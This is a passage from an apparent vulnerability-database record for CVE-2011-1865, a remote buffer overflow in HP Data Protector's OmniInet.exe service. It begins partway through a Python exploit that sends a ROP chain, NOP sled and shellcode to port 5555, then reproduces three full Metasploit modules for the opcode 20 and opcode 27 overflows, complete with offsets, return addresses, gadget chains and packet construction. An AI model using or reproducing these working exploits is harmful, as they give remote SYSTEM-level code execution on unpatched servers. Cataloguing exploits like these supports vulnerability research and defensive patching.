point at our shellcode on the stack and overwrite the placeholder\r\npacket += \"\\x40\\xa0\\x35\\x7c\" # 0x7c35a040 : # MOV EAX,ECX # RETN \r\npacket += \"\\x1c\\x3b\\x37\\x7c\" # 0x7c373b1c : # ADD EAX,100 # POP EBP # RETN\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\xd4\\x3d\\x43\\x00\" # 0x00433dd4 : # MOV DWORD PTR DS:[ECX+18],EAX # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\n\r\n# Craft the shellcode size in EAX and overwrite the placeholder\r\npacket += \"\\x2e\\x40\\x34\\x7c\" # 0x7c34402e : # POP EDX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x59\\x3d\\x41\\x41\" # Value to SUB from EAX \r\npacket += \"\\x23\\x62\\x37\\x7c\" # 0x7c376223 : # POP EAX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x41\\x41\\x41\\x41\" # To be the sub-ee 41413D59\r\npacket += \"\\xe9\\xfa\\x36\\x7c\" # 0x7c36fae9 : # SUB EAX,EDX # POP ESI # RETN ** [MSVCR71.dll]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x69\\x60\\x37\\x7c\" # 0x7c376069 : # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x44\" * 12 # filler\r\n\r\n# Point ESP to WPM and the stack and return\r\npacket += \"\\x40\\xa0\\x35\\x7c\" # 0x7c35a040 : # MOV EAX,ECX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x05\\x8b\\x34\\x7c\" # 0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll]\r\npacket += \"\\x45\" * 8\r\npacket +=\"\\x90\" *120\r\npacket += shellcode\r\npacket +=\"C\"* 980000\r\n# post\r\npacket +=(\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\"\r\n\"\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\"\r\n\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\"\r\n\"\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\")\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\nsock.close()\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17468/"}, {"lastseen": "2016-02-02T07:58:21", "description": "HP OmniInet.exe Opcode 20 Buffer Overflow. CVE-2011-1865. Remote exploit for windows platform", "published": "2011-07-04T00:00:00", "type": "exploitdb", "title": "HP OmniInet.exe Opcode 20 - Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-04T00:00:00", "id": "EDB-ID:17490", "href": "https://www.exploit-db.com/exploits/17490/", "sourceData": "##\r\n# $Id: hp_omniinet_4.rb 13096 2011-07-04 22:33:47Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"HP OmniInet.exe Opcode 20 Buffer Overflow\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in HP Data Protector's OmniInet\r\n\t\t\t\tprocess. By supplying a long string of data as the file path with opcode '20',\r\n\t\t\t\ta buffer overflow can occur when this data is being written on the stack where\r\n\t\t\t\tno proper bounds checking is done beforehand, which results arbitrary code\r\n\t\t\t\texecution under the context of SYSTEM. This module is also made against systems\r\n\t\t\t\tsuch as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\r\n\t\t\t\tenabled by default.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => \"$Revision: 13096 $\",\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Oren Isacson', #Initial discovery, poc\r\n\t\t\t\t\t'muts', #Initial poc of the ROP exploit w/ dookie\r\n\t\t\t\t\t'dookie', #Initial poc of the ROP exploit w/ muts\r\n\t\t\t\t\t'sinn3r', #MSF module with corelanc0d3r (Also Thx to MC and HD)\r\n\t\t\t\t\t'corelanc0d3r', #MSF module with sinn3r\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-1865' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/17468/' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\r\n\t\t\t\t\t[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'PrependEncoder' => \"\\x66\\x81\\xc4\\xb8\\x0b\\x61\\x9d\", #add sp, 0xb88; popad; popfd\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"process\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t#If 'Max' gets too long (ie. 10000 bytes), we can get a busted heap\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on XP SP3 or Win Server 2003',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 2005, #For overwriting a RETN (6481 for SEH)\r\n\t\t\t\t\t\t\t'Ret' => 0x7C342629, #RETN - MSVCR71.dll\r\n\t\t\t\t\t\t\t'Max' => 5000,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on Win Server 2008',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1993, #For overwriting a RETN (6481 for SEH)\r\n\t\t\t\t\t\t\t'Ret' => 0x7C342629, #RETN - MSVCR71.dll\r\n\t\t\t\t\t\t\t'Max' => 5000,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Jun 29 2011\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options([Opt::RPORT(5555)], self.class)\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack(\"L\")[0].to_i\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t#mona.py tekniq\r\n\t\t#https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/\r\n\t\trop = [\r\n\t\t\t#Initial setup\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t#ROP begins here\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c37a140, # Make EAX readable\r\n\t\t\t0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)\r\n\t\t\tnop, # EBP\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c37a140, # <- VirtualProtect() found in IAT\r\n\t\t\t0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)\r\n\t\t\t0x7c346c0b, # Slide, so next gadget would write to correct stack location\r\n\t\t\t0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)\r\n\t\t\tnop, # EDI (filler)\r\n\t\t\tnop, # will be patched at runtime (VP), then picked up into ESI\r\n\t\t\tnop, # EBX (filler)\r\n\t\t\t0x7c376402, # POP EBP # RETN (msvcr71.dll)\r\n\t\t\t0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0xfffff82f, # size 20001 bytes\r\n\t\t\t0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c354901, # POP EBX # RETN (MSVCR71.dll)\r\n\t\t\t0xffffffff, # pop value into ebx\r\n\t\t\t0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)\r\n\t\t\t0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c34d201, # POP ECX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)\r\n\t\t\t0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)\r\n\t\t\t0x7c34b8d8, # ROP NOP (-> edi)\r\n\t\t\t0x7c344f87, # POP EDX # RETN (MSVCR71.dll)\r\n\t\t\t0xffffffc0, # value to negate, target value : 0x00000040, target: edx\r\n\t\t\t0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x90909090, # NOPS (-> eax)\r\n\t\t\t0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)\r\n\t\t].pack('V*')\r\n\r\n\t\t#Overflowing path \"C:\\Program Files\\OmniBack\\bin\\\"\r\n\t\t#4807 bytes after target.ret, but we need to use less than that to avoid a busted heap\r\n\t\tsploit = ''\r\n\t\tsploit << rand_text_alpha(target['Offset']-sploit.length)\r\n\t\tsploit << [target.ret].pack('V*')\r\n\t\tsploit << rop\r\n\t\tsploit << payload.encoded\r\n\t\tsploit << rand_text_alpha(target['Max']-sploit.length)\r\n\r\n\t\tpkt = ''\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpkt << \"\\x41\\x41\" #Length field place holder\r\n\t\tpkt << \"\\xff\\xfe\"\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x32\\x00\")\r\n\t\tpkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 5)\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x20\")\r\n\t\tpkt << Rex::Text.to_unicode(\"20\") #Opcode\r\n\t\tpkt << \"\\x00\"\r\n\t\tpkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 7)\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x20\\x00\")\r\n\t\tpkt << sploit\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 16)\r\n\r\n\t\t#pkt length\r\n\t\tpkt[2,2] = [pkt.length-5].pack('n')\r\n\r\n\t\tprint_status(\"Sending packet to #{datastore['RHOST']}...\")\r\n\t\tsock.put(pkt)\r\n\r\n\t\t#Data Protector lags before triggering the vuln code\r\n\t\t#Long delay seems necessary to ensure we get a shell back\r\n\t\tselect(nil,nil,nil,20)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17490/"}], "metasploit": [{"lastseen": "2020-10-06T00:46:30", "description": "This module exploits a vulnerability found in HP Data Protector's OmniInet process. By supplying a long string of data as the file path with opcode '20', a buffer overflow can occur when this data is being written on the stack where no proper bounds checking is done beforehand, which results arbitrary code execution under the context of SYSTEM. This module is also made against systems such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR enabled by default.\n", "published": "2011-07-04T17:02:40", "type": "metasploit", "title": "HP OmniInet.exe Opcode 20 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_4", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"HP OmniInet.exe Opcode 20 Buffer Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability found in HP Data Protector's OmniInet\n process. By supplying a long string of data as the file path with opcode '20',\n a buffer overflow can occur when this data is being written on the stack where\n no proper bounds checking is done beforehand, which results arbitrary code\n execution under the context of SYSTEM. This module is also made against systems\n such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\n enabled by default.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Oren Isacson', #Initial discovery, poc\n 'muts', #Initial poc of the ROP exploit w/ dookie (WPM())\n 'dookie', #Initial poc of the ROP exploit w/ muts (WPM())\n 'sinn3r', #MSF module with corelanc0d3r (Also Thx to MC and HD)\n 'corelanc0d3r <peter.ve[at]corelan.be>', #MSF module with sinn3r, VP() ROP Chain\n ],\n 'References' =>\n [\n [ 'CVE', '2011-1865' ],\n [ 'OSVDB', '73571'],\n [ 'EDB', '17468' ],\n [ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\n [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182' ],\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x66\\x81\\xc4\\xb8\\x0b\\x61\\x9d\", #add sp, 0xb88; popad; popfd\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"process\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n #If 'Max' gets too long (ie. 10000 bytes), we can get a busted heap\n [\n 'HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008',\n {\n 'Offset' => 1993, #For overwriting a RETN (6481 for SEH)\n 'Ret' => 0x7C342629, #RETN - MSVCR71.dll\n 'Max' => 5000,\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 29 2011\",\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(5555)])\n end\n\n def nop\n return make_nops(4).unpack(\"L\")[0].to_i\n end\n\n def exploit\n\n connect\n\n #mona.py tekniq\n #https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/\n rop = [\n #Initial setup - ROP Flight Landing Strip\n 0x7C342629, # SLIDE\n 0x7C342629, # SLIDE\n 0x7C342629, # SLIDE\n 0x7C342629, # SLIDE\n #ROP begins here\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0x7c37a140, # Make EAX readable\n 0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)\n nop, # EBP\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0x7c37a140, # <- VirtualProtect() found in IAT\n 0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)\n 0x7c346c0b, # Slide, so next gadget would write to correct stack location\n 0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)\n nop, # EDI (filler)\n nop, # will be patched at runtime (VP), then picked up into ESI\n nop, # EBX (filler)\n 0x7c376402, # POP EBP # RETN (msvcr71.dll)\n 0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0xfffff82f, # size 20001 bytes\n 0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)\n 0x7c354901, # POP EBX # RETN (MSVCR71.dll)\n 0xffffffff, # pop value into ebx\n 0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)\n 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)\n 0x7c34d201, # POP ECX # RETN (MSVCR71.dll)\n 0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)\n 0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)\n 0x7c34b8d8, # ROP NOP (-> edi)\n 0x7c344f87, # POP EDX # RETN (MSVCR71.dll)\n 0xffffffc0, # value to negate, target value : 0x00000040, target: edx\n 0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0x90909090, # NOPS (-> eax)\n 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)\n ].pack('V*')\n\n #Overflowing path \"C:\\Program Files\\OmniBack\\bin\\\"\n #4807 bytes after target.ret, but we need to use less than that to avoid a busted heap\n sploit = ''\n sploit << rand_text_alpha(target['Offset']-sploit.length)\n sploit << [target.ret].pack('V*')\n sploit << rop\n sploit << payload.encoded\n sploit << rand_text_alpha(target['Max']-sploit.length)\n\n pkt = ''\n pkt << Rex::Text.to_unicode(\"\\x00\")\n pkt << \"\\x41\\x41\" #Length field place holder\n pkt << \"\\xff\\xfe\"\n pkt << Rex::Text.to_unicode(\"\\x32\\x00\")\n pkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 5)\n pkt << Rex::Text.to_unicode(\"\\x20\")\n pkt << Rex::Text.to_unicode(\"20\") #Opcode\n pkt << \"\\x00\"\n pkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 7)\n pkt << Rex::Text.to_unicode(\"\\x20\\x00\")\n pkt << sploit\n pkt << Rex::Text.to_unicode(\"\\x00\")\n pkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 16)\n\n #pkt length\n pkt[2,2] = [pkt.length-5].pack('n')\n\n print_status(\"Sending packet to #{datastore['RHOST']}...\")\n sock.put(pkt)\n\n #Data Protector lags before triggering the vuln code\n #Long delay seems necessary to ensure we get a shell back\n select(nil,nil,nil,20)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_omniinet_4.rb"}, {"lastseen": "2020-08-27T01:01:45", "description": "This module exploits a buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code.\n", "published": "2011-07-01T17:07:38", "type": "metasploit", "title": "HP OmniInet.exe Opcode 27 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2017-09-14T02:03:34", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_3", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted opcode 27 packet,\n a remote attacker may be able to execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-1865' ],\n [ 'OSVDB', '73571'],\n [ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',\n {\n #POP/POP/RET from OmniBack\\bin\\MSVCR71.dll\n 'Ret' => 0x7c35630d\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 29 2011'))\n\n register_options([Opt::RPORT(5555)])\n end\n\n def check\n\n connect\n sock.put(rand_text_alpha_upper(64))\n resp = sock.get_once(-1,5)\n disconnect\n\n if (resp)\n resp = resp.unpack('v*').pack('C*')\n print_status(\"Received response: \" + resp)\n\n # extract version\n if (resp =~ /HP Data Protector/)\n version = resp.split[3]\n elsif (resp =~ /HP OpenView Storage Data Protector/)\n version = resp.split[5]\n elsif (resp =~ /HP StorageWorks Application Recovery Manager/)\n version = resp.split[5]\n else\n return Exploit::CheckCode::Detected\n end\n\n version = version.split('.')\n major = version[1].to_i\n minor = version[2].to_i\n if ((major < 6) or (major == 6 and minor < 11))\n return Exploit::CheckCode::Appears\n end\n\n if ((major > 6) or (major == 6 and minor >= 11))\n return Exploit::CheckCode::Safe\n end\n\n end\n return Exploit::CheckCode::Safe\n\n end\n\n def exploit\n\n connect\n\n trigger = rand_text_alpha_upper(10000)\n trigger[4552, payload.encoded.length] = payload.encoded\n trigger[5352, 8] = generate_seh_record(target.ret)\n trigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-788\").encode_string\n\n opcode = \"27\"\n\n packet = Rex::Text.to_unicode(\"\\x00\")\n packet << \"\\x27\\xca\" #length\n packet << \"\\xff\\xfe\\x32\"\n packet << \"\\x00\\x00\\x00\"\n packet << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 3\n packet << Rex::Text.to_unicode(\"\\x20\")\n packet << trigger\n packet << Rex::Text.to_unicode(\"\\x00\")\n packet << Rex::Text.to_unicode(\"\\x20\\x61\\x00\")\n packet << Rex::Text.to_unicode(\"\\x20\" + opcode + \"\\x00\")\n packet << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 24\n\n print_status(\"Trying #{target.name}...\")\n sock.put(packet)\n\n select(nil,nil,nil,10)\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_omniinet_3.rb"}]}
